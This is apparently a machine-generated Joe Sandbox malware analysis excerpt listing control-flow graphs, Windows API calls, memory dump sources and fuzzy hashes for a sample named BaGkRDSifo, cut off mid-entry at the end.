              control_flow_graph 1910 6addd98-6adde17 1912 6adde19-6adde23 1910->1912 1913 6adde50-6adde70 1910->1913 1912->1913 1914 6adde25-6adde27 1912->1914 1918 6addea9-6addec9 1913->1918 1919 6adde72-6adde7c 1913->1919 1916 6adde29-6adde33 1914->1916 1917 6adde4a-6adde4d 1914->1917 1920 6adde35 1916->1920 1921 6adde37-6adde46 1916->1921 1917->1913 1929 6addecb-6added5 1918->1929 1930 6addf02-6addf24 1918->1930 1919->1918 1923 6adde7e-6adde80 1919->1923 1920->1921 1921->1921 1922 6adde48 1921->1922 1922->1917 1924 6addea3-6addea6 1923->1924 1925 6adde82-6adde8c 1923->1925 1924->1918 1927 6adde8e 1925->1927 1928 6adde90-6adde9f 1925->1928 1927->1928 1928->1928 1932 6addea1 1928->1932 1929->1930 1931 6added7-6added9 1929->1931 1938 6addf26-6addf4a 1930->1938 1939 6addf92-6addf96 1930->1939 1933 6addefc-6addeff 1931->1933 1934 6addedb-6addee5 1931->1934 1932->1924 1933->1930 1936 6addee9-6addef8 1934->1936 1937 6addee7 1934->1937 1936->1936 1940 6addefa 1936->1940 1937->1936 1947 6addf4c-6addf4e 1938->1947 1948 6addf7a-6addf7f 1938->1948 1941 6addf98-6addfd6 1939->1941 1942 6addfda-6addfea 1939->1942 1940->1933 1941->1942 1944 6addfec-6addff9 1942->1944 1945 6ade026-6ade08e GetPrivateProfileStringA 1942->1945 1944->1945 1949 6addffb-6addffd 1944->1949 1960 6ade097-6ade0a8 1945->1960 1961 6ade090-6ade096 1945->1961 1953 6addf70-6addf78 1947->1953 1954 6addf50-6addf5a 1947->1954 1957 6addf81-6addf8d 1948->1957 1950 6addfff-6ade009 1949->1950 1951 6ade020-6ade023 1949->1951 1955 6ade00d-6ade01c 1950->1955 1956 6ade00b 1950->1956 1951->1945 1953->1957 1962 6addf5c 1954->1962 1963 6addf5e-6addf6c 1954->1963 1955->1955 1965 6ade01e 1955->1965 1956->1955 1957->1939 1966 6ade0be-6ade0e5 1960->1966 1967 6ade0aa-6ade0b6 1960->1967 1961->1960 1962->1963 1963->1963 1964 6addf6e 1963->1964 1964->1953 1965->1951 1971 6ade0f5-6ade0f9 1966->1971 1972 6ade0e7-6ade0eb 1966->1972 1967->1966 1975 6ade109-6ade10d 1971->1975 1976 6ade0fb-6ade0ff 1971->1976 1972->1971 1974 6ade0ed 1972->1974 1974->1971 1979 6ade11d-6ade121 1975->1979 1980 6ade10f-6ade113 1975->1980 1976->1975 1978 6ade101 1976->1978 1978->1975 1982 6ade131-6ade135 1979->1982 1983 6ade123-6ade127 1979->1983 1980->1979 1981 6ade115 1980->1981 1981->1979 1984 6ade145 1982->1984 1985 6ade137-6ade13b 1982->1985 1983->1982 1986 6ade129 1983->1986 1988 6ade146 1984->1988 1985->1984 1987 6ade13d 1985->1987 1986->1982 1987->1984 1988->1988
              APIs
              • GetPrivateProfileStringA.KERNEL32(?,?,?,00000000,?,?), ref: 06ADE07E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: PrivateProfileString
              • String ID: fXV$fXV
              • API String ID: 1096422788-1107164591
              • Opcode ID: 3791ef0d90a4e14f0bb8ecca719305da3800b5e4d042f52917c3a7b52fade02d
              • Instruction ID: cc807813ccb323c26011b12edebedd61a77c144d9f6144545dce97d430e6a2b0
              • Opcode Fuzzy Hash: 3791ef0d90a4e14f0bb8ecca719305da3800b5e4d042f52917c3a7b52fade02d
              • Instruction Fuzzy Hash: 70C19170D002198FDB54EFA9C9817AEFBF2FF48300F148569E856EB284DB749981CB91

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1989 5a31ce7-5a31d56 1990 5a31d61-5a31d68 1989->1990 1991 5a31d58-5a31d5e 1989->1991 1992 5a31d73-5a31dab 1990->1992 1993 5a31d6a-5a31d70 1990->1993 1991->1990 1994 5a31db3-5a31e12 CreateWindowExW 1992->1994 1993->1992 1995 5a31e14-5a31e1a 1994->1995 1996 5a31e1b-5a31e53 1994->1996 1995->1996 2000 5a31e60 1996->2000 2001 5a31e55-5a31e58 1996->2001 2002 5a31e61 2000->2002 2001->2000 2002->2002
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A31E02
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CreateWindow
              • String ID: fXV$fXV
              • API String ID: 716092398-1107164591
              • Opcode ID: 4e91f3330116856f3fa64890946055e3f4df4433de9b9956d30b013ae891de4f
              • Instruction ID: 2fe0940712894e8eb7664baee2b233357406f4b624daf4d236815eaf2d2de747
              • Opcode Fuzzy Hash: 4e91f3330116856f3fa64890946055e3f4df4433de9b9956d30b013ae891de4f
              • Instruction Fuzzy Hash: FF41DEB1D003089FDF14CFA9C985ADEFBB1BF48304F64812AE819AB250D7759885CF94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2003 5a31cf0-5a31d56 2004 5a31d61-5a31d68 2003->2004 2005 5a31d58-5a31d5e 2003->2005 2006 5a31d73-5a31e12 CreateWindowExW 2004->2006 2007 5a31d6a-5a31d70 2004->2007 2005->2004 2009 5a31e14-5a31e1a 2006->2009 2010 5a31e1b-5a31e53 2006->2010 2007->2006 2009->2010 2014 5a31e60 2010->2014 2015 5a31e55-5a31e58 2010->2015 2016 5a31e61 2014->2016 2015->2014 2016->2016
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A31E02
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CreateWindow
              • String ID: fXV$fXV
              • API String ID: 716092398-1107164591
              • Opcode ID: 55c3ccd1dca3bee8c9242d255d9e53bcfeacf3ed04b8c303215eade3afdedcf0
              • Instruction ID: 3002c4695dc8eff73d53057745bbd264f829833163b1471d00913aa1334f0948
              • Opcode Fuzzy Hash: 55c3ccd1dca3bee8c9242d255d9e53bcfeacf3ed04b8c303215eade3afdedcf0
              • Instruction Fuzzy Hash: 1241DEB1D003489FDB14CFAAC984ADEFBF5BF48304F64812AE819AB210D7759845CF94
              APIs
              • GetFocus.USER32 ref: 0A3094E6
              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0A309537
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CallbackDispatcherFocusUser
              • String ID: fXV
              • API String ID: 1077007772-3172339192
              • Opcode ID: d707dd9aec02e641cb5e67154a0c7977f16dc7ae4634a8793525afa6e4d8c101
              • Instruction ID: 6d35a48a2b472b5c63309653b5753629126cadd306e03db44a1708e0fab89acf
              • Opcode Fuzzy Hash: d707dd9aec02e641cb5e67154a0c7977f16dc7ae4634a8793525afa6e4d8c101
              • Instruction Fuzzy Hash: C8317A75A102158FDB10DF6AC954BAEBBF8AF48A10F154459E805EB791DB30EC00CFE5
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID: fXV$fXV
              • API String ID: 1029625771-1107164591
              • Opcode ID: 24116de9454e2b53a5c6606e2d19e247b38bb86729fba7395f7cb608d543ceb9
              • Instruction ID: 5b5c88f5f299efc81357bd1a80a8277e66c79e597b720633321317837b8daa3b
              • Opcode Fuzzy Hash: 24116de9454e2b53a5c6606e2d19e247b38bb86729fba7395f7cb608d543ceb9
              • Instruction Fuzzy Hash: CA3148B1D002688FEF10CFA9C944B9EBBF1AF48715F14812AE816A7350D7749841CF96
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05AAADA1,00000800,00000000,00000000), ref: 05AAAF92
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID: fXV$fXV
              • API String ID: 1029625771-1107164591
              • Opcode ID: 75109122dd99f13d6262bcb686acbcddbb488b9eab64eee8f7e23951c3aa50a8
              • Instruction ID: 8ee45fad594e0908b65e521eae8e5556264cb2206ea39c02ce6b3c8ca48f8472
              • Opcode Fuzzy Hash: 75109122dd99f13d6262bcb686acbcddbb488b9eab64eee8f7e23951c3aa50a8
              • Instruction Fuzzy Hash: 7D2157B6C04348CFCB24CF9AD944AEEFBF4FB48220F14842AD529A7610D375A945CFA5
              APIs
              • GetFocus.USER32 ref: 0A3094E6
              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0A309537
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CallbackDispatcherFocusUser
              • String ID: fXV
              • API String ID: 1077007772-3172339192
              • Opcode ID: 3b0a2c87a6fe5385710577199250a28c85143c8b5869ac815a0c94806f075fc5
              • Instruction ID: 698faf2b25f3ad5172c667944c6a9afb3e8cb3328eb35bec30d80c48273e97f8
              • Opcode Fuzzy Hash: 3b0a2c87a6fe5385710577199250a28c85143c8b5869ac815a0c94806f075fc5
              • Instruction Fuzzy Hash: 312187B49012598FCB10CF65C844BEEFBB4FB08610F29849AE804AB382C334A804CFE4
              APIs
              • GetModuleHandleW.KERNEL32(00000000), ref: 05AAAD26
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: HandleModule
              • String ID: fXV
              • API String ID: 4139908857-3172339192
              • Opcode ID: d65fcbb82a0691b49cd9365cd513c2d8bfe0376ba142ef210b88d8a0a397f078
              • Instruction ID: de00c6b9eaa96da10d710db1b9dff7d883deaf78031309c2755a03bbb0cce7de
              • Opcode Fuzzy Hash: d65fcbb82a0691b49cd9365cd513c2d8bfe0376ba142ef210b88d8a0a397f078
              • Instruction Fuzzy Hash: 1E715971A00B058FDB24DF6AD544B6ABBF2FF88300F00892ED49AD7A50D775E845CB95
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 05AA5CA1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Create
              • String ID: fXV
              • API String ID: 2289755597-3172339192
              • Opcode ID: e9c919d49df04ef99f6eb6793b7f7f2354ffd4b1b4fc954c931bec179e8da3fd
              • Instruction ID: 55dad72b6402ae9824dfd4e29c9257febc2dfbc4a5c0f7f7273490a013de7c94
              • Opcode Fuzzy Hash: e9c919d49df04ef99f6eb6793b7f7f2354ffd4b1b4fc954c931bec179e8da3fd
              • Instruction Fuzzy Hash: 3941EDB1C00758CFEB24CFA9C984B8EBBF5BF48704F20806AD408AB251DB756946CF64
              APIs
              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05A34381
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CallProcWindow
              • String ID: fXV
              • API String ID: 2714655100-3172339192
              • Opcode ID: 278456f38d778b3dc07a7191a143f132d79bda09f4546fc3ba780d0ade04ff66
              • Instruction ID: 5c8152efaea53640abd0558d20ca6a2dcfb581846c74600f1781326f72678e4b
              • Opcode Fuzzy Hash: 278456f38d778b3dc07a7191a143f132d79bda09f4546fc3ba780d0ade04ff66
              • Instruction Fuzzy Hash: 214126B4900305CFDB14CF99C549EAAFBF5FB8C318F248459E419AB321D334A841CBA0
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ActiveWindow
              • String ID: fXV
              • API String ID: 2558294473-3172339192
              • Opcode ID: 03785c4a9181e7cf639d84d95a2f13971e8fc7992a159ebaa3679ea744f4d98c
              • Instruction ID: 2e11786fbd8167314541845c68dd335ae0a70d113d5d902193ebc5f99df413b0
              • Opcode Fuzzy Hash: 03785c4a9181e7cf639d84d95a2f13971e8fc7992a159ebaa3679ea744f4d98c
              • Instruction Fuzzy Hash: E331BE71900309CFEF60DFAAC948BAEBBF4FB48344F24802AD559A7682C7789445CF64
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 05AA5CA1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Create
              • String ID: fXV
              • API String ID: 2289755597-3172339192
              • Opcode ID: 5104962e9478e66357d961221e5a8e5daba6cb2fde852770633fdd84c67fb34d
              • Instruction ID: 8ea64e6cfe3e3c58698812ae2e014f9cb2a472e9b7678f521900786fa318f07d
              • Opcode Fuzzy Hash: 5104962e9478e66357d961221e5a8e5daba6cb2fde852770633fdd84c67fb34d
              • Instruction Fuzzy Hash: 9541BCB1C00758CFEB24DFA9C984B8EBBF5BF48704F20806AD418AB255DB756946CF64
              APIs
              • GetClassInfoW.USER32(?,00000000), ref: 06ADAF94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ClassInfo
              • String ID: fXV
              • API String ID: 3534257612-3172339192
              • Opcode ID: 5a598af70e0689edc81ad7ea5daa7258fd5e37a865ab43f77d0f1fe5a93ec6ea
              • Instruction ID: 662fdf464c81e6df1094574a01f7e12a111e2419789ba051a8210a556db92abf
              • Opcode Fuzzy Hash: 5a598af70e0689edc81ad7ea5daa7258fd5e37a865ab43f77d0f1fe5a93ec6ea
              • Instruction Fuzzy Hash: 4C31BFB5D093999FCB15CFA5C844A9EBFF0EF4A310F1480AED445A7252D338A508CB65
              APIs
              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06ACB8B7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: DrawText
              • String ID: fXV
              • API String ID: 2175133113-3172339192
              • Opcode ID: 966808c1ff093e86835bf528b3d6ebf480e58a2a50fc9300ea7b32806bf9769f
              • Instruction ID: c2989c7dc2aebcfc0482f2e31f27cc5a04e408876451b7fe8b6a32266b9bd5ad
              • Opcode Fuzzy Hash: 966808c1ff093e86835bf528b3d6ebf480e58a2a50fc9300ea7b32806bf9769f
              • Instruction Fuzzy Hash: 7631E3B5D012099FDB10CF9AD880ADEFBF4FB48224F14842EE819A7310D375A941CFA4
              APIs
              • SendMessageW.USER32(?,?,?,?), ref: 06AD89ED
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: fXV
              • API String ID: 3850602802-3172339192
              • Opcode ID: 90c2563e98bc2c5f9b3d539650abb676a43a860b04b3a989f0781ea8fd8e6fca
              • Instruction ID: a3a4105afe740bd31b8e16c9e3433f7c60bed9a2c5e11a5c90680e15efd9c693
              • Opcode Fuzzy Hash: 90c2563e98bc2c5f9b3d539650abb676a43a860b04b3a989f0781ea8fd8e6fca
              • Instruction Fuzzy Hash: 1A21ACB6D002489FCB21DFA9D945BEFBFF8EF88320F14801AE458A7251C3349944CBA1
              APIs
              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06ACB8B7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: DrawText
              • String ID: fXV
              • API String ID: 2175133113-3172339192
              • Opcode ID: 8c453c4f72c54ec0f724eda8da3c928edb037c8adc59d1479f3de611748de30c
              • Instruction ID: 3c667f53e7f03414f690fd9c7a8a48e2b20b29de75fd8e602bdfa1606daafb0f
              • Opcode Fuzzy Hash: 8c453c4f72c54ec0f724eda8da3c928edb037c8adc59d1479f3de611748de30c
              • Instruction Fuzzy Hash: F021C0B5D002499FDB10DF9AD880ADEFBF4FB48224F14842EE819A7310D775A944CFA4
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 06AD5B7A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CurrentThread
              • String ID: fXV
              • API String ID: 2882836952-3172339192
              • Opcode ID: 2f8a6d958867df1840b806e20a3ef0a80f51f6a660cf8c62de77bf3c9ba7922d
              • Instruction ID: 55792e33824081d92d1f5a9990600a14e1ec9cbdf027ff900efa9017caf80f7c
              • Opcode Fuzzy Hash: 2f8a6d958867df1840b806e20a3ef0a80f51f6a660cf8c62de77bf3c9ba7922d
              • Instruction Fuzzy Hash: A53163B4D002898FDB11DFA9D984A9EFBF0FF08314F14895AD019AB352C338A944CFA1
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05AAD007
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID: fXV
              • API String ID: 3793708945-3172339192
              • Opcode ID: dce2e612d24377e4a3959b2c81c9c3dcdc3240815598565ba047237c9de543ab
              • Instruction ID: ae8c049cfb40baa68f3f1ef64a44c9ef6e34c7ae2ca1bdaa57f429cb40b50372
              • Opcode Fuzzy Hash: dce2e612d24377e4a3959b2c81c9c3dcdc3240815598565ba047237c9de543ab
              • Instruction Fuzzy Hash: A82105B6D002489FDB10CFAAD984AEEBBF4FB48320F14801AE955A7350D374A941CFA5
              APIs
              • GetForegroundWindow.USER32 ref: 0A303721
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ForegroundWindow
              • String ID: fXV
              • API String ID: 2020703349-3172339192
              • Opcode ID: 1a088b93bd3cf176a2a303e406499ab53c3733a8f71e6d27e3a0f2a0f019a695
              • Instruction ID: 456f6a952ac761cf3c9553b2cfd6b3dccfd4c1f2163a3c2a4624106f3f0de699
              • Opcode Fuzzy Hash: 1a088b93bd3cf176a2a303e406499ab53c3733a8f71e6d27e3a0f2a0f019a695
              • Instruction Fuzzy Hash: 5421BEB4C043488FDB219FA98554BEEBFF5EF88610F10441ED416AB380DB749805CFA5
              APIs
              • MonitorFromPoint.USER32(?,?,00000002), ref: 06AD2A1F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: FromMonitorPoint
              • String ID: fXV
              • API String ID: 1566494148-3172339192
              • Opcode ID: 0a7e1c10ea097a9c80d2e694b7e377c8c0f5cd567d28c16ce2592f973175390e
              • Instruction ID: 3371a1b8bd00529f97775cea95e2e12e1f7a3cf7c8d904c033d191952307117c
              • Opcode Fuzzy Hash: 0a7e1c10ea097a9c80d2e694b7e377c8c0f5cd567d28c16ce2592f973175390e
              • Instruction Fuzzy Hash: 74218E75D002488FDB10DF9AC444BAEFBF5FB88711F10801AE956AB380C7356904CFA1
              APIs
              • EnumThreadWindows.USER32(?,00000000,?), ref: 06AD5C59
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: EnumThreadWindows
              • String ID: fXV
              • API String ID: 2941952884-3172339192
              • Opcode ID: 445dd37de8458bfe81d118350764e52fdf01d7ce20cf2803bd79b459c7a9a6b7
              • Instruction ID: 10187a029125f9dce8338d4c1fc9a4c0a29942b5fbc9de43fcebef04de2b86eb
              • Opcode Fuzzy Hash: 445dd37de8458bfe81d118350764e52fdf01d7ce20cf2803bd79b459c7a9a6b7
              • Instruction Fuzzy Hash: 4D215BB1D002098FDB10DFAAC944BEEFBF4EF48320F14842AD469A7250D774A940CFA5
              APIs
              • MonitorFromPoint.USER32(?,?,00000002), ref: 06AD2A1F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: FromMonitorPoint
              • String ID: fXV
              • API String ID: 1566494148-3172339192
              • Opcode ID: 747c983798a27226e85740eb8e72190090054de7b2ff119c72ebd353ff5c1349
              • Instruction ID: 6ecd8798bd594f853191abaf30ea2f74ff67f3428fad00330cb695d09acb32e3
              • Opcode Fuzzy Hash: 747c983798a27226e85740eb8e72190090054de7b2ff119c72ebd353ff5c1349
              • Instruction Fuzzy Hash: 562179B5D002488FDB20DFAAD445BEEBBF4FB48710F10801AE866AB340C3346A05CFA5
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05AAD007
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID: fXV
              • API String ID: 3793708945-3172339192
              • Opcode ID: 6e17c10f73b2153a5c5a3ea2b9acd6d6a8549e139eed565780acd0f526ef6d63
              • Instruction ID: 17438524abfa4540eb53f025c83d1dac6f025d0ebf75e3cd2a86d2cba8c3444d
              • Opcode Fuzzy Hash: 6e17c10f73b2153a5c5a3ea2b9acd6d6a8549e139eed565780acd0f526ef6d63
              • Instruction Fuzzy Hash: 4221E4B5D002489FDB10CFAAD984ADEFBF4FB48310F14801AE955A3350D374A940CF65
              APIs
              • GetClassInfoW.USER32(?,00000000), ref: 06ADAF94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ClassInfo
              • String ID: fXV
              • API String ID: 3534257612-3172339192
              • Opcode ID: 3eb5b75b8a93fb3ebfd69868d30aa3e46f86f08a6f4400df76288336ef6c4963
              • Instruction ID: 185074d2492badae5dceac624f82bfef0bb5b9941858d89af779a2c969f40509
              • Opcode Fuzzy Hash: 3eb5b75b8a93fb3ebfd69868d30aa3e46f86f08a6f4400df76288336ef6c4963
              • Instruction Fuzzy Hash: BE2102B6D017099FDB10DF9AC984BDEFBF4FF48210F14842AE919A7250D378A904CB65
              APIs
              • EnumThreadWindows.USER32(?,00000000,?), ref: 06AD5C59
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: EnumThreadWindows
              • String ID: fXV
              • API String ID: 2941952884-3172339192
              • Opcode ID: cc7e3ecfb3929fce2a1956f4f194f4bb4ec16c8e241d164be466b6dcb0be1226
              • Instruction ID: 1ec0b842d4c3a615b93cde9f14d938b1011cf345d6f90fa694cd3295cf7c1f13
              • Opcode Fuzzy Hash: cc7e3ecfb3929fce2a1956f4f194f4bb4ec16c8e241d164be466b6dcb0be1226
              • Instruction Fuzzy Hash: F82136B1D002098FDB14DFAAC944BEEFBF4EF88320F14842AD469A7250D778A945CF65
              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 06ADFD45
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MessagePost
              • String ID: fXV
              • API String ID: 410705778-3172339192
              • Opcode ID: 8922abfe37d5d8d9ec6addca4faf8a3ffbb31ada0000690d1aaed6034119d8f0
              • Instruction ID: cfbc445a9f67c3637c875f56e888cb21c1e9639c7e2ffb901910fd67e4a2c366
              • Opcode Fuzzy Hash: 8922abfe37d5d8d9ec6addca4faf8a3ffbb31ada0000690d1aaed6034119d8f0
              • Instruction Fuzzy Hash: 59218BB18053898FDB11CF65C844BDABFF4EF09210F14849AD594A7252C378A944CB66
              APIs
              • SetWindowTextW.USER32(?,00000000), ref: 06AD75BA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: TextWindow
              • String ID: fXV
              • API String ID: 530164218-3172339192
              • Opcode ID: 0b0730e488d705c132d42570d464b3acc0f1364b60bf9b9dcc32d0986458a4f1
              • Instruction ID: ac0ffb44f675cd1a3d6f2da54283292698b7d3c01b3158cb5a3fffc235c423df
              • Opcode Fuzzy Hash: 0b0730e488d705c132d42570d464b3acc0f1364b60bf9b9dcc32d0986458a4f1
              • Instruction Fuzzy Hash: C32136B6C006498FDB24CF9AC848BDEFBF4EB48310F14842AD469A7640D338A545CFA5
              APIs
              • GetForegroundWindow.USER32 ref: 0A303721
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ForegroundWindow
              • String ID: fXV
              • API String ID: 2020703349-3172339192
              • Opcode ID: 75cfeabdabb87f810503a67602c8820bebe2359e795d890de2a031129f5280e7
              • Instruction ID: 8950db4a88c7e2e803de992680bbc11963c87081d1a07ef432e2122b45b72fd5
              • Opcode Fuzzy Hash: 75cfeabdabb87f810503a67602c8820bebe2359e795d890de2a031129f5280e7
              • Instruction Fuzzy Hash: 21119AB5D003088FDB24DFA9C654BDEBBF5EB88610F10442EC416AB380DB749440CFA5
              APIs
              • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0A30F8A2,00000000,00000000,041B4100,035B1A20), ref: 0A30FCF0
              Strings
              Memory Dump Source
